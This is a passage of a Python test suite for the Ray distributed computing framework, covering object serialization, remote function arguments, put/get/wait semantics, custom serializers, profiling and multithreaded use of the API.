u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start_regular):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
def test_ray_recursive_objects(ray_start_regular):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start_regular):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start_regular):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(ray_start_regular):
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start_regular):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(ray_start_regular):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.ray_start()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
assert ray.get(g._remote()) == []
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
@ray.remote
class Actor2(object):
def __init__(self):
pass
def method(self):
pass
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
a2 = Actor2._remote()
ray.get(a2.method._remote())
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(ray_start_regular):
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
    assert ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Wait 0.1 second for the objects to be deleted.
# 4. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
class RawActor(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
